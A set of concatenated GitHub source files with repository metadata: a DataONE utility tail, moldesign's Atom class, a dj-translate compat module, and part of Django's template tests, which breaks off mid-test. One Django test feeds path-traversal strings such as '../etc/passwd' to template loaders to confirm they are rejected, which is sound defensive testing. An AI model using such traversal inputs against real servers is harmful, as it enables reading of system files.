if __name__ == "__main__":
sys.exit(main())
|
{
"content_hash": "53ffefd9a2025c57ebe01640fbcb41c3",
"timestamp": "",
"source": "github",
"line_count": 365,
"max_line_length": 96,
"avg_line_length": 32.013698630136986,
"alnum_prop": 0.6314933675652546,
"repo_name": "DataONEorg/d1_python",
"id": "ebcb7abb2817547b86eb4331e54d53d0ae06ba7c",
"size": "12497",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utilities/src/d1_util/find_node_versions.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "4798"
},
{
"name": "HTML",
"bytes": "13358"
},
{
"name": "Inno Setup",
"bytes": "3430"
},
{
"name": "JavaScript",
"bytes": "2068"
},
{
"name": "Python",
"bytes": "3547939"
},
{
"name": "Shell",
"bytes": "5670"
},
{
"name": "XSLT",
"bytes": "89205"
}
],
"symlink_target": ""
}
|
import numpy as np
import moldesign as mdt
from moldesign import data, utils
from moldesign import units as u
from . import toplevel, AtomContainer, AtomList, AtomArray, AtomCoordinate, Bond
class AtomDrawingMixin(object):
""" Functions for creating atomic visualizations.
Note:
        This is a mixin class designed only to be mixed into the :class:`Atom` class. Routines
        are separated out here for code organization only - they could be included in the main
        Atom class without changing any functionality.
"""
#@utils.args_from(mdt.molecule.Molecule.draw2d, allexcept=['highlight_atoms']) # import order
def draw2d(self, **kwargs):
""" Draw a 2D viewer with this atom highlighted (Jupyter only).
In biomolecules, only draws the atom's residue.
Args:
width (int): width of viewer in pixels
height (int): height of viewer in pixels
Returns:
mdt.ChemicalGraphViewer: viewer object
"""
if self.molecule:
if self.molecule.is_small_molecule:
return self.molecule.draw2d(highlight_atoms=[self], **kwargs)
elif self.molecule.is_biomolecule:
return self.residue.draw2d(highlight_atoms=[self], **kwargs)
else:
raise ValueError('No drawing routine specified')
else:
raise ValueError('No drawing routine specified')
#@utils.args_from(mdt.molecule.Molecule.draw2d, allexcept=['highlight_atoms']) # import order
def draw3d(self, **kwargs):
""" Draw a 3D viewer with this atom highlighted (Jupyter only).
Args:
width (int): width of viewer in pixels
height (int): height of viewer in pixels
Returns:
mdt.GeometryViewer: viewer object
"""
return self.molecule.draw3d(highlight_atoms=[self], **kwargs)
def draw(self, width=300, height=300):
""" Draw a 2D and 3D viewer with this atom highlighted (notebook only)
Args:
width (int): width of viewer in pixels
height (int): height of viewer in pixels
Returns:
ipy.HBox: viewer object
"""
import ipywidgets as ipy
viz2d = self.draw2d(width=width, height=height, display=False)
viz3d = self.draw3d(width=width, height=height, display=False)
return ipy.HBox([viz2d, viz3d])
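# Illustrative notebook usage of the drawing mixin above (hypothetical molecule;
# assumes ``mdt.from_name`` is available and that Jupyter widgets are installed):
#
#     mol = mdt.from_name('benzene')
#     mol.atoms[0].draw(width=400, height=400)   # side-by-side 2D / 3D views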
class AtomGeometryMixin(object):
""" Functions measuring distances between atoms and other things.
Note:
        This is a mixin class designed only to be mixed into the :class:`Atom` class. Routines
        are separated out here for code organization only - they could be included in the main
        Atom class without changing any functionality.
"""
@utils.args_from(AtomContainer.distance)
def distance(self, *args, **kwargs):
return self._container.distance(*args, **kwargs)
@utils.args_from(AtomContainer.atoms_within)
def atoms_within(self, *args, **kwargs):
return self._container.atoms_within(*args, **kwargs)
@utils.args_from(AtomContainer.residues_within)
def residues_within(self, *args, **kwargs):
return self._container.residues_within(*args, **kwargs)
@utils.args_from(AtomContainer.calc_distance_array)
def calc_distances(self, *args, **kwargs):
array = self._container.calc_distance_array(*args, **kwargs)
return array[0]
@property
def _container(self):
""" AtomContainer: a container with just this atom in it.
        This is a convenience property for accessing all of the :class:`AtomContainer`'s
        useful methods for dealing with geometry.
"""
return AtomList([self])
class AtomPropertyMixin(object):
""" Functions accessing computed atomic properties.
Note:
        This is a mixin class designed only to be mixed into the :class:`Atom` class. Routines
        are separated out here for code organization only - they could be included in the main
        Atom class without changing any functionality.
"""
@property
def ff(self):
""" moldesign.utils.DotDict: This atom's force field parameters, if available (``None``
otherwise)
"""
try:
ff = self.molecule.energy_model.mdtforcefield
except AttributeError:
return None
if ff is None: return None
return utils.DotDict(partialcharge=ff.partial_charges[self],
lj=ff.lennard_jones[self])
@property
def basis_functions(self):
""" List[mdt.orbitals.AtomicBasisFunction]: This atom's basis functions, if available
(``None`` otherwise)
"""
if self.molecule is None:
return None
try:
wfn = self.molecule.wfn
except mdt.exceptions.NotCalculatedError:
return None
return wfn.aobasis.on_atom.get(self, [])
@property
def properties(self):
""" moldesign.utils.DotDict: Returns any calculated properties for this atom
"""
props = utils.DotDict()
for name, p in self.molecule.properties.iteritems():
if hasattr(p, 'type') and p.type == 'atomic':
props[name] = p[self]
return props
class AtomReprMixin(object):
""" Functions for printing out various strings related to the atom.
Note:
        This is a mixin class designed only to be mixed into the :class:`Atom` class. Routines
        are separated out here for code organization only - they could be included in the main
        Atom class without changing any functionality.
"""
def __str__(self):
desc = '%s %s (elem %s)' % (self.__class__.__name__, self.name, self.elem)
molstring = ''
if self.molecule:
molstring = ', index %d' % self.index
if self.molecule.is_biomolecule:
molstring += ' (res %s chain %s)' % (self.residue.name, self.chain.name)
return '%s%s' % (desc, molstring)
def _shortstr(self):
""" A shorter string representation for easier-to-read lists of atoms
"""
fields = [self.name]
if self.molecule:
fields.append('#%d' % self.index)
if self.molecule.is_biomolecule:
fields.append('in %s.%s' % (self.chain.name, self.residue.name))
return ' '.join(fields)
def __repr__(self):
try:
if self.molecule:
return '<%s in molecule %s>' % (self, self.molecule)
else:
return '<%s>' % self
except:
return '<%s at %s (exception in __repr__)>' % (self.__class__.__name__, id(self))
def markdown_summary(self):
"""Return a markdown-formatted string describing this atom
Returns:
str: markdown-formatted string
"""
if self.molecule is None:
lines = ["<h3>Atom %s</h3>" % self.name]
else:
lines = ["<h3>Atom %s (index %d)</h3>" % (self.name, self.index)]
lines.append('**Atomic number**: %d' % self.atnum)
lines.append("**Mass**: %s" % self.mass)
lines.append('**Formal charge**: %s' % self.formal_charge)
if self.molecule is not None:
lines.append('\n')
if self.molecule.is_biomolecule:
if self.pdbindex is not None:
lines.append('**PDB serial #**: %s'%self.pdbindex)
lines.append("**Residue**: %s (index %d)" % (self.residue.name, self.residue.index))
lines.append("**Chain**: %s" % self.chain.name)
lines.append("**Molecule**: %s" % self.molecule.name)
for ibond, (nbr, order) in enumerate(self.bond_graph.iteritems()):
lines.append('**Bond %d** (order = %d): %s (index %s) in %s' % (
ibond + 1, order, nbr.name, nbr.index, nbr.residue.name))
if self.basis_functions:
lines.append('**Basis functions:**<br>' + '<br>'.join(map(str,self.basis_functions)))
if self.ff:
lines.append('**Forcefield partial charge**: %s' % self.ff.partialcharge)
# TODO: deal with other LJ types, e.g., AB?
lines.append(u'**Forcefield LJ params**: '
u'\u03C3=%s, \u03B5=%s' % (
self.ff.lj.sigma.defunits(),
self.ff.lj.epsilon.defunits()))
# position and momentum
table = utils.MarkdownTable('', 'x', 'y', 'z')
table.add_line(['**position /** {}'.format(u.default.length)] +
['%12.3f' % x.defunits_value() for x in self.position])
table.add_line(['**momentum /** {}'.format(u.default.momentum)] +
['%12.3e' % m.defunits_value() for m in self.momentum])
try:
self.force
except:
pass
else:
table.add_line(['**force /** {.units}'.format(self.force.defunits())] +
['%12.3e' % m.defunits_value() for m in self.force])
lines.append('\n\n' + table.markdown() + '\n\n')
# All other assigned properties
return '<br>'.join(lines)
def _repr_markdown_(self):
return self.markdown_summary()
@toplevel
class Atom(AtomDrawingMixin, AtomGeometryMixin, AtomPropertyMixin, AtomReprMixin):
""" A data structure representing an atom.
``Atom`` objects store information about individual atoms within a larger molecular system,
providing access to atom-specific geometric, biomolecular, topological and property
information. Each :class:`Molecule<moldesign.Molecule>` is composed of a list of atoms.
Atoms can be instantiated directly, but they will generally be created
automatically as part of molecules.
Args:
name (str): The atom's name (if not passed, set to the element name + the atom's index)
atnum (int): Atomic number (if not passed, determined from element if possible)
mass (units.Scalar[mass]): The atomic mass (if not passed, set to the most abundant isotopic
mass)
chain (moldesign.Chain): biomolecular chain that this atom belongs to
residue (moldesign.Residue): biomolecular residue that this atom belongs to
pdbname (str): name from PDB entry, if applicable
pdbindex (int): atom serial number in the PDB entry, if applicable
element (str): Elemental symbol (if not passed, determined from atnum if possible)
**Atom instance attributes:**
Attributes:
name (str): A descriptive name for this atom
element (str): IUPAC elemental symbol ('C', 'H', 'Cl', etc.)
index (int): the atom's current index in the molecule
            (``self is self.molecule.atoms[self.index]``)
atnum (int): atomic number (synonyms: atomic_num)
mass (u.Scalar[mass]): the atom's mass
position (units.Vector[length]): atomic position vector. Once an atom is part of a molecule,
this quantity will refer to ``self.molecule.positions[self.index]``.
momentum (units.Vector[momentum]): atomic momentum vector. Once an atom is part of a
molecule, this quantity will refer to ``self.molecule.momenta[self.index]``.
x,y,z (u.Scalar[length]): x, y, and z components of ``atom.position``
        vx, vy, vz (u.Scalar[length/time]): x, y, and z components of ``atom.velocity``
        px, py, pz (u.Scalar[momentum]): x, y, and z components of ``atom.momentum``
        fx, fy, fz (u.Scalar[force]): x, y, and z components of ``atom.force``
residue (moldesign.Residue): biomolecular residue that this atom belongs to
chain (moldesign.Chain): biomolecular chain that this atom belongs to
        molecule (moldesign.Molecule): molecule that this atom belongs to
        index (int): index in the parent molecule: ``atom is atom.molecule.atoms[index]``
**Atom methods and properties**
See also methods offered by the mixin superclasses:
- :class:`AtomDrawingMixin`
- :class:`AtomGeometryMixin`
- :class:`AtomPropertyMixin`
- :class:`AtomReprMixin`
"""
x, y, z = (AtomCoordinate('position', i) for i in xrange(3))
vx, vy, vz = (AtomCoordinate('velocity', i) for i in xrange(3))
px, py, pz = (AtomCoordinate('momentum', i) for i in xrange(3))
fx, fy, fz = (AtomCoordinate('force', i) for i in xrange(3))
position = AtomArray('_position', 'positions')
momentum = AtomArray('_momentum', 'momenta')
atomic_number = utils.Synonym('atnum')
#################################################################
# Methods for BUILDING the atom and indexing it in a molecule
def __init__(self, name=None, atnum=None, mass=None, chain=None, residue=None,
formal_charge=None, pdbname=None, pdbindex=None, element=None):
# Allow user to instantiate an atom as Atom(6) or Atom('C')
if atnum is None and element is None:
if isinstance(name, int):
atnum = name
name = None
else: element = name
if element: self.atnum = data.ATOMIC_NUMBERS[element]
else: self.atnum = atnum
self.name = utils.if_not_none(name, self.elem)
self.pdbname = utils.if_not_none(pdbname, self.name)
self.pdbindex = pdbindex
if mass is None: self.mass = data.ATOMIC_MASSES[self.atnum]
else: self.mass = mass
self.formal_charge = utils.if_not_none(formal_charge, 0.0 * u.q_e)
self.residue = residue
self.chain = chain
self.molecule = None
self.index = None
self._position = np.zeros(3) * u.default.length
self._momentum = np.zeros(3) * (u.default.length*
u.default.mass/u.default.time)
self._bond_graph = {}
@utils.args_from(AtomContainer.copy)
def copy(self, *args, **kwargs):
""" Copy an atom (delegate to AtomContainer)
"""
return self._container.copy(*args, **kwargs)[0]
def __getstate__(self):
"""Helper for pickling"""
state = self.__dict__.copy()
if self.molecule is not None: # then these don't belong to the atom anymore
state['_bond_graph'] = None
state['_position'] = self.position
state['_momentum'] = self.momentum
return state
def _set_molecule(self, molecule):
""" Permanently make this atom part of a molecule (private)
Args:
            molecule (moldesign.Molecule): the molecule that this atom will become a part of
"""
if self.molecule and (molecule is not self.molecule):
raise ValueError('Atom is already part of a molecule')
self.molecule = molecule
def _index_into_molecule(self, array_name, moleculearray, index):
""" Link the atom's positions and momenta to the parent molecule (private)
Args:
array_name (str): the private name of the array (assumes private name is '_'+array_name)
moleculearray (u.Array): the molecule's master array
index: the atom's index in the molecule
Note:
This will be called by the molecule's init method
"""
oldarray = getattr(self, array_name)
moleculearray[index, :] = oldarray
setattr(self, '_' + array_name, None) # remove the internally stored version
def bond_to(self, other, order):
""" Create or modify a bond with another atom
Args:
other (Atom): atom to bond to
order (int): bond order
Returns:
moldesign.molecules.bonds.Bond: bond object
"""
if self.molecule is other.molecule:
self.bond_graph[other] = other.bond_graph[self] = order
else: # allow unassigned atoms to be bonded to anything for building purposes
self.bond_graph[other] = order
return Bond(self, other, order)
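    # Illustrative usage of ``bond_to`` (hypothetical atoms, for clarity only):
    #
    #     c = Atom('C')
    #     h = Atom('H')
    #     bond = c.bond_to(h, 1)   # single C-H bond; both bond graphs are updated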
@property
def bond_graph(self):
""" Mapping[Atom, int]: dictionary of this atoms bonded neighbors, of the form
``{bonded_atom1, bond_order1, ...}``
"""
if self.molecule is None:
return self._bond_graph
else:
self._bond_graph = None
try:
return self.molecule.bond_graph[self]
except KeyError:
self.molecule.bond_graph[self] = {}
return self.molecule.bond_graph[self]
@bond_graph.setter
def bond_graph(self, value):
if self.molecule is None:
self._bond_graph = value
else:
self._bond_graph = None
self.molecule.bond_graph[self] = value
@property
def bonds(self):
""" List[Bond]: list of all bonds this atom is involved in
"""
return [Bond(self, nbr, order) for nbr, order in self.bond_graph.iteritems()]
@property
def heavy_bonds(self):
""" List[Bond]: list of all heavy atom bonds (where BOTH atoms are not hydrogen)
Note:
this returns an empty list if called on a hydrogen atom
"""
if self.atnum == 1:
return []
else:
return [Bond(self, nbr, order)
for nbr, order in self.bond_graph.iteritems()
if nbr.atnum > 1]
@property
def force(self):
""" (units.Vector[force]): atomic force vector. This quantity must be calculated - it is
equivalent to ``self.molecule.forces[self.index]``
Raises:
moldesign.NotCalculatedError: if molecular forces have not been calculated
"""
f = self.molecule.forces
return f[self.index]
@property
def velocity(self):
""" u.Vector[length/time, 3]: velocity of this atom; equivalent to
``self.momentum/self.mass``
"""
return (self.momentum / self.mass).defunits()
@velocity.setter
def velocity(self, value):
self.momentum = value * self.mass
@property
def num_bonds(self):
""" int: the number of other atoms this atom is bonded to
"""
return len(self.bond_graph)
nbonds = num_bonds
@property
def valence(self):
""" int: the sum of this atom's bond orders
"""
return sum(v for v in self.bond_graph.itervalues())
@property
def symbol(self):
""" str: elemental symbol
"""
return data.ELEMENTS.get(self.atnum, '?')
elem = element = symbol
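# Minimal construction sketch (illustration only, not part of the original module):
def _atom_construction_sketch():
    carbon = Atom('C')                    # by element symbol
    carbon_by_number = Atom(6)            # by atomic number
    named_hydrogen = Atom(element='H', name='H1')
    # Setting velocity stores the corresponding momentum (velocity * mass).
    named_hydrogen.velocity = np.array([1.0, 0.0, 0.0]) * u.default.length / u.default.time
    return carbon, carbon_by_number, named_hydrogen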
|
{
"content_hash": "3c5e0ffa093d02d501afc7d7c7b6ffb9",
"timestamp": "",
"source": "github",
"line_count": 487,
"max_line_length": 100,
"avg_line_length": 38.18069815195072,
"alnum_prop": 0.5945466279444982,
"repo_name": "tkzeng/molecular-design-toolkit",
"id": "8a8b3a93820714f1bf1ecb6d8c3b558d9427cf97",
"size": "19172",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "moldesign/molecules/atoms.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Fortran",
"bytes": "91473"
},
{
"name": "Groff",
"bytes": "6579"
},
{
"name": "Jupyter Notebook",
"bytes": "139700"
},
{
"name": "Python",
"bytes": "856527"
},
{
"name": "Shell",
"bytes": "2268"
}
],
"symlink_target": ""
}
|
"""
The `compat` module provides support for backwards compatibility with older
versions of Django/Python, and compatibility wrappers around optional packages.
"""
try:
# Available in Python 3.1+
import importlib
except ImportError:
# Will be removed in Django 1.9
from django.utils import importlib
try:
import goslate
except ImportError:
goslate = None
except SyntaxError:
import sys
import warnings
        warnings.warn('goslate disabled due to lack of support for Python %s' % (
            sys.version.split()[0][:3]), RuntimeWarning)
goslate = None
try:
import googleapiclient
except ImportError:
googleapiclient = None
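# Illustrative consumer-side guard (hypothetical helper, not part of this module):
# code importing these optional names is expected to check for None, e.g.:
def _require_goslate():
    if goslate is None:
        raise RuntimeError(
            'goslate is unavailable (not installed, or unsupported on this '
            'Python version)')
    return goslate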
|
{
"content_hash": "fbdd07e0959b593628b6b869f7d4adf8",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 79,
"avg_line_length": 25.307692307692307,
"alnum_prop": 0.7218844984802432,
"repo_name": "dadasoz/dj-translate",
"id": "66ea244a7c6c06017e26473487bafdb5ed4411b2",
"size": "658",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "autotranslate/compat.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1850"
},
{
"name": "HTML",
"bytes": "15669"
},
{
"name": "JavaScript",
"bytes": "4614"
},
{
"name": "Python",
"bytes": "69514"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, unicode_literals
from django.conf import settings
if __name__ == '__main__':
# When running this file in isolation, we need to set up the configuration
# before importing 'template'.
settings.configure()
from datetime import date, datetime, timedelta
import time
import os
import sys
import traceback
from urlparse import urljoin
from django import template
from django.template import base as template_base, RequestContext, Template, Context
from django.core import urlresolvers
from django.template import loader
from django.template.loaders import app_directories, filesystem, cached
from django.test import RequestFactory
from django.test.utils import (setup_test_template_loader,
restore_template_loaders, override_settings)
from django.utils import unittest
from django.utils.formats import date_format
from django.utils.translation import activate, deactivate, ugettext as _
from django.utils.safestring import mark_safe
from django.utils.tzinfo import LocalTimezone
from .callables import CallableVariablesTests
from .context import ContextTests
from .custom import CustomTagTests, CustomFilterTests
from .parser import ParserTests
from .unicode import UnicodeTests
from .nodelist import NodelistTest, ErrorIndexTest
from .smartif import SmartIfTests
from .response import (TemplateResponseTest, CacheMiddlewareTest,
SimpleTemplateResponseTest, CustomURLConfTest)
try:
from .loaders import RenderToStringTest, EggLoaderTest
except ImportError as e:
if "pkg_resources" in e.message:
pass # If setuptools isn't installed, that's fine. Just move on.
else:
raise
from . import filters
#################################
# Custom template tag for tests #
#################################
register = template.Library()
class EchoNode(template.Node):
def __init__(self, contents):
self.contents = contents
def render(self, context):
return " ".join(self.contents)
def do_echo(parser, token):
return EchoNode(token.contents.split()[1:])
def do_upper(value):
return value.upper()
register.tag("echo", do_echo)
register.tag("other_echo", do_echo)
register.filter("upper", do_upper)
template.libraries['testtags'] = register
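# Illustrative rendering of the custom test tags registered above (hypothetical
# helper, for clarity only; requires Django settings to be configured, as done
# at the top of this module when it is run directly):
def _render_echo_example():
    t = Template("{% load testtags %}{% echo hello world %}")
    return t.render(Context({}))   # -> "hello world"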
#####################################
# Helper objects for template tests #
#####################################
class SomeException(Exception):
silent_variable_failure = True
class SomeOtherException(Exception):
pass
class ContextStackException(Exception):
pass
class ShouldNotExecuteException(Exception):
pass
class SomeClass:
def __init__(self):
self.otherclass = OtherClass()
def method(self):
return "SomeClass.method"
def method2(self, o):
return o
def method3(self):
raise SomeException
def method4(self):
raise SomeOtherException
def __getitem__(self, key):
if key == 'silent_fail_key':
raise SomeException
elif key == 'noisy_fail_key':
raise SomeOtherException
raise KeyError
def silent_fail_attribute(self):
raise SomeException
silent_fail_attribute = property(silent_fail_attribute)
def noisy_fail_attribute(self):
raise SomeOtherException
noisy_fail_attribute = property(noisy_fail_attribute)
class OtherClass:
def method(self):
return "OtherClass.method"
class TestObj(object):
def is_true(self):
return True
def is_false(self):
return False
def is_bad(self):
raise ShouldNotExecuteException()
class SilentGetItemClass(object):
def __getitem__(self, key):
raise SomeException
class SilentAttrClass(object):
def b(self):
raise SomeException
b = property(b)
class UTF8Class:
"Class whose __str__ returns non-ASCII data"
def __str__(self):
return 'ŠĐĆŽćžšđ'.encode('utf-8')
class Templates(unittest.TestCase):
def setUp(self):
self.old_static_url = settings.STATIC_URL
self.old_media_url = settings.MEDIA_URL
settings.STATIC_URL = "/static/"
settings.MEDIA_URL = "/media/"
def tearDown(self):
settings.STATIC_URL = self.old_static_url
settings.MEDIA_URL = self.old_media_url
def test_loaders_security(self):
ad_loader = app_directories.Loader()
fs_loader = filesystem.Loader()
def test_template_sources(path, template_dirs, expected_sources):
if isinstance(expected_sources, list):
# Fix expected sources so they are abspathed
expected_sources = [os.path.abspath(s) for s in expected_sources]
        # Test the two loaders (app_directories and filesystem).
func1 = lambda p, t: list(ad_loader.get_template_sources(p, t))
func2 = lambda p, t: list(fs_loader.get_template_sources(p, t))
for func in (func1, func2):
if isinstance(expected_sources, list):
self.assertEqual(func(path, template_dirs), expected_sources)
else:
self.assertRaises(expected_sources, func, path, template_dirs)
template_dirs = ['/dir1', '/dir2']
test_template_sources('index.html', template_dirs,
['/dir1/index.html', '/dir2/index.html'])
test_template_sources('/etc/passwd', template_dirs, [])
test_template_sources('etc/passwd', template_dirs,
['/dir1/etc/passwd', '/dir2/etc/passwd'])
test_template_sources('../etc/passwd', template_dirs, [])
test_template_sources('../../../etc/passwd', template_dirs, [])
test_template_sources('/dir1/index.html', template_dirs,
['/dir1/index.html'])
test_template_sources('../dir2/index.html', template_dirs,
['/dir2/index.html'])
test_template_sources('/dir1blah', template_dirs, [])
test_template_sources('../dir1blah', template_dirs, [])
# UTF-8 bytestrings are permitted.
test_template_sources(b'\xc3\x85ngstr\xc3\xb6m', template_dirs,
['/dir1/Ångström', '/dir2/Ångström'])
# Unicode strings are permitted.
test_template_sources('Ångström', template_dirs,
['/dir1/Ångström', '/dir2/Ångström'])
test_template_sources('Ångström', [b'/Stra\xc3\x9fe'], ['/Straße/Ångström'])
test_template_sources(b'\xc3\x85ngstr\xc3\xb6m', [b'/Stra\xc3\x9fe'],
['/Straße/Ångström'])
# Invalid UTF-8 encoding in bytestrings is not. Should raise a
# semi-useful error message.
test_template_sources(b'\xc3\xc3', template_dirs, UnicodeDecodeError)
# Case insensitive tests (for win32). Not run unless we're on
# a case insensitive operating system.
        if os.path.normcase('/TEST') == os.path.normcase('/test'):
template_dirs = ['/dir1', '/DIR2']
test_template_sources('index.html', template_dirs,
['/dir1/index.html', '/DIR2/index.html'])
test_template_sources('/DIR1/index.HTML', template_dirs,
['/DIR1/index.HTML'])
def test_loader_debug_origin(self):
# Turn TEMPLATE_DEBUG on, so that the origin file name will be kept with
# the compiled templates.
old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, True
old_loaders = loader.template_source_loaders
try:
loader.template_source_loaders = (filesystem.Loader(),)
# We rely on the fact that runtests.py sets up TEMPLATE_DIRS to
# point to a directory containing a 404.html file. Also that
# the file system and app directories loaders both inherit the
# load_template method from the BaseLoader class, so we only need
# to test one of them.
load_name = '404.html'
template = loader.get_template(load_name)
template_name = template.nodelist[0].source[0].name
self.assertTrue(template_name.endswith(load_name),
'Template loaded by filesystem loader has incorrect name for debug page: %s' % template_name)
            # Also test the cached loader, since it overrides load_template
cache_loader = cached.Loader(('',))
cache_loader._cached_loaders = loader.template_source_loaders
loader.template_source_loaders = (cache_loader,)
template = loader.get_template(load_name)
template_name = template.nodelist[0].source[0].name
self.assertTrue(template_name.endswith(load_name),
'Template loaded through cached loader has incorrect name for debug page: %s' % template_name)
template = loader.get_template(load_name)
template_name = template.nodelist[0].source[0].name
self.assertTrue(template_name.endswith(load_name),
'Cached template loaded through cached loader has incorrect name for debug page: %s' % template_name)
finally:
loader.template_source_loaders = old_loaders
settings.TEMPLATE_DEBUG = old_td
def test_include_missing_template(self):
"""
Tests that the correct template is identified as not existing
when {% include %} specifies a template that does not exist.
"""
# TEMPLATE_DEBUG must be true, otherwise the exception raised
# during {% include %} processing will be suppressed.
old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, True
old_loaders = loader.template_source_loaders
try:
# Test the base loader class via the app loader. load_template
# from base is used by all shipped loaders excepting cached,
# which has its own test.
loader.template_source_loaders = (app_directories.Loader(),)
load_name = 'test_include_error.html'
r = None
try:
tmpl = loader.select_template([load_name])
r = tmpl.render(template.Context({}))
except template.TemplateDoesNotExist as e:
settings.TEMPLATE_DEBUG = old_td
self.assertEqual(e.args[0], 'missing.html')
self.assertEqual(r, None, 'Template rendering unexpectedly succeeded, produced: ->%r<-' % r)
finally:
loader.template_source_loaders = old_loaders
settings.TEMPLATE_DEBUG = old_td
def test_extends_include_missing_baseloader(self):
"""
Tests that the correct template is identified as not existing
when {% extends %} specifies a template that does exist, but
that template has an {% include %} of something that does not
exist. See #12787.
"""
# TEMPLATE_DEBUG must be true, otherwise the exception raised
# during {% include %} processing will be suppressed.
old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, True
old_loaders = loader.template_source_loaders
try:
# Test the base loader class via the app loader. load_template
# from base is used by all shipped loaders excepting cached,
# which has its own test.
loader.template_source_loaders = (app_directories.Loader(),)
load_name = 'test_extends_error.html'
tmpl = loader.get_template(load_name)
r = None
try:
r = tmpl.render(template.Context({}))
except template.TemplateDoesNotExist as e:
settings.TEMPLATE_DEBUG = old_td
self.assertEqual(e.args[0], 'missing.html')
self.assertEqual(r, None, 'Template rendering unexpectedly succeeded, produced: ->%r<-' % r)
finally:
loader.template_source_loaders = old_loaders
settings.TEMPLATE_DEBUG = old_td
def test_extends_include_missing_cachedloader(self):
"""
Same as test_extends_include_missing_baseloader, only tests
behavior of the cached loader instead of BaseLoader.
"""
old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, True
old_loaders = loader.template_source_loaders
try:
cache_loader = cached.Loader(('',))
cache_loader._cached_loaders = (app_directories.Loader(),)
loader.template_source_loaders = (cache_loader,)
load_name = 'test_extends_error.html'
tmpl = loader.get_template(load_name)
r = None
try:
r = tmpl.render(template.Context({}))
except template.TemplateDoesNotExist as e:
self.assertEqual(e.args[0], 'missing.html')
self.assertEqual(r, None, 'Template rendering unexpectedly succeeded, produced: ->%r<-' % r)
# For the cached loader, repeat the test, to ensure the first attempt did not cache a
# result that behaves incorrectly on subsequent attempts.
tmpl = loader.get_template(load_name)
try:
tmpl.render(template.Context({}))
except template.TemplateDoesNotExist as e:
self.assertEqual(e.args[0], 'missing.html')
self.assertEqual(r, None, 'Template rendering unexpectedly succeeded, produced: ->%r<-' % r)
finally:
loader.template_source_loaders = old_loaders
settings.TEMPLATE_DEBUG = old_td
def test_token_smart_split(self):
# Regression test for #7027
token = template.Token(template.TOKEN_BLOCK, 'sometag _("Page not found") value|yesno:_("yes,no")')
split = token.split_contents()
self.assertEqual(split, ["sometag", '_("Page not found")', 'value|yesno:_("yes,no")'])
@override_settings(SETTINGS_MODULE=None, TEMPLATE_DEBUG=True)
def test_url_reverse_no_settings_module(self):
# Regression test for #9005
from django.template import Template, Context
t = Template('{% url will_not_match %}')
c = Context()
with self.assertRaises(urlresolvers.NoReverseMatch):
t.render(c)
@override_settings(DEBUG=True, TEMPLATE_DEBUG=True)
def test_no_wrapped_exception(self):
"""
The template system doesn't wrap exceptions, but annotates them.
Refs #16770
"""
c = Context({"coconuts": lambda: 42 / 0})
t = Template("{{ coconuts }}")
with self.assertRaises(ZeroDivisionError) as cm:
t.render(c)
self.assertEqual(cm.exception.django_template_source[1], (0, 14))
def test_invalid_block_suggestion(self):
# See #7876
from django.template import Template, TemplateSyntaxError
try:
t = Template("{% if 1 %}lala{% endblock %}{% endif %}")
except TemplateSyntaxError as e:
self.assertEqual(e.args[0], "Invalid block tag: 'endblock', expected 'elif', 'else' or 'endif'")
def test_templates(self):
template_tests = self.get_template_tests()
filter_tests = filters.get_filter_tests()
# Quickly check that we aren't accidentally using a name in both
# template and filter tests.
overlapping_names = [name for name in filter_tests if name in template_tests]
assert not overlapping_names, 'Duplicate test name(s): %s' % ', '.join(overlapping_names)
template_tests.update(filter_tests)
cache_loader = setup_test_template_loader(
dict([(name, t[0]) for name, t in template_tests.iteritems()]),
use_cached_loader=True,
)
failures = []
tests = template_tests.items()
tests.sort()
# Turn TEMPLATE_DEBUG off, because tests assume that.
old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, False
# Set TEMPLATE_STRING_IF_INVALID to a known string.
old_invalid = settings.TEMPLATE_STRING_IF_INVALID
expected_invalid_str = 'INVALID'
        # Set ALLOWED_INCLUDE_ROOTS so that ssi works.
old_allowed_include_roots = settings.ALLOWED_INCLUDE_ROOTS
settings.ALLOWED_INCLUDE_ROOTS = (
os.path.dirname(os.path.abspath(__file__)),
)
        # Warm the URL reversing cache. This ensures we don't pay the cost of
        # warming the cache during one of the tests.
urlresolvers.reverse('regressiontests.templates.views.client_action',
kwargs={'id':0,'action':"update"})
for name, vals in tests:
if isinstance(vals[2], tuple):
normal_string_result = vals[2][0]
invalid_string_result = vals[2][1]
if isinstance(invalid_string_result, tuple):
expected_invalid_str = 'INVALID %s'
invalid_string_result = invalid_string_result[0] % invalid_string_result[1]
template_base.invalid_var_format_string = True
try:
template_debug_result = vals[2][2]
except IndexError:
template_debug_result = normal_string_result
else:
normal_string_result = vals[2]
invalid_string_result = vals[2]
template_debug_result = vals[2]
if 'LANGUAGE_CODE' in vals[1]:
activate(vals[1]['LANGUAGE_CODE'])
else:
activate('en-us')
for invalid_str, template_debug, result in [
('', False, normal_string_result),
(expected_invalid_str, False, invalid_string_result),
('', True, template_debug_result)
]:
settings.TEMPLATE_STRING_IF_INVALID = invalid_str
settings.TEMPLATE_DEBUG = template_debug
for is_cached in (False, True):
try:
try:
test_template = loader.get_template(name)
except ShouldNotExecuteException:
failures.append("Template test (Cached='%s', TEMPLATE_STRING_IF_INVALID='%s', TEMPLATE_DEBUG=%s): %s -- FAILED. Template loading invoked method that shouldn't have been invoked." % (is_cached, invalid_str, template_debug, name))
try:
output = self.render(test_template, vals)
except ShouldNotExecuteException:
failures.append("Template test (Cached='%s', TEMPLATE_STRING_IF_INVALID='%s', TEMPLATE_DEBUG=%s): %s -- FAILED. Template rendering invoked method that shouldn't have been invoked." % (is_cached, invalid_str, template_debug, name))
except ContextStackException:
failures.append("Template test (Cached='%s', TEMPLATE_STRING_IF_INVALID='%s', TEMPLATE_DEBUG=%s): %s -- FAILED. Context stack was left imbalanced" % (is_cached, invalid_str, template_debug, name))
continue
except Exception:
exc_type, exc_value, exc_tb = sys.exc_info()
